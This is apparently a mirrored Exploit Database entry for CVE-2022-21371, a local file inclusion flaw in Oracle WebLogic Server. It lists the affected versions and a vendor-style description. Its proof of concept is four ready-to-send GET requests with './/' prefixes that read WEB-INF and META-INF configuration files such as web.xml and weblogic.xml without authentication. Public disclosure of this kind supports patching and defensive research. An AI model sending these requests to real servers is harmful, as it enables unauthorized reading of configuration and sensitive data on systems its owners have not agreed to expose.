Oracle WebLogic Server 14.1.1.0.0 – Local File Inclusion

• Exploit Database
• 11 阅读

• 作者： Jonah Tan
  日期： 2022-01-27
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/50688/

• # Exploit Title: Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion
  # Date: 25/1/2022
  # Exploit Author: Jonah Tan (@picar0jsu)
  # Vendor Homepage: https://www.oracle.com
  # Software Link:
  https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html
  # Version: 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0
  # Tested on: Windows Server 2019
  # CVE : CVE-2022-21371
  
  # Description
  Vulnerability in the Oracle WebLogic Server product of Oracle Fusion
  Middleware (component: Web Container).
  Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0
  and 14.1.1.0.0.
  Easily exploitable vulnerability allows unauthenticated attacker with
  network access via HTTP to compromise Oracle WebLogic Server.
  Successful attacks of this vulnerability can result in unauthorized access
  to critical data or complete access to all Oracle WebLogic Server
  accessible data.
  
  # PoC
  GET .//META-INF/MANIFEST.MF
  GET .//WEB-INF/web.xml
  GET .//WEB-INF/portlet.xml
  GET .//WEB-INF/weblogic.xml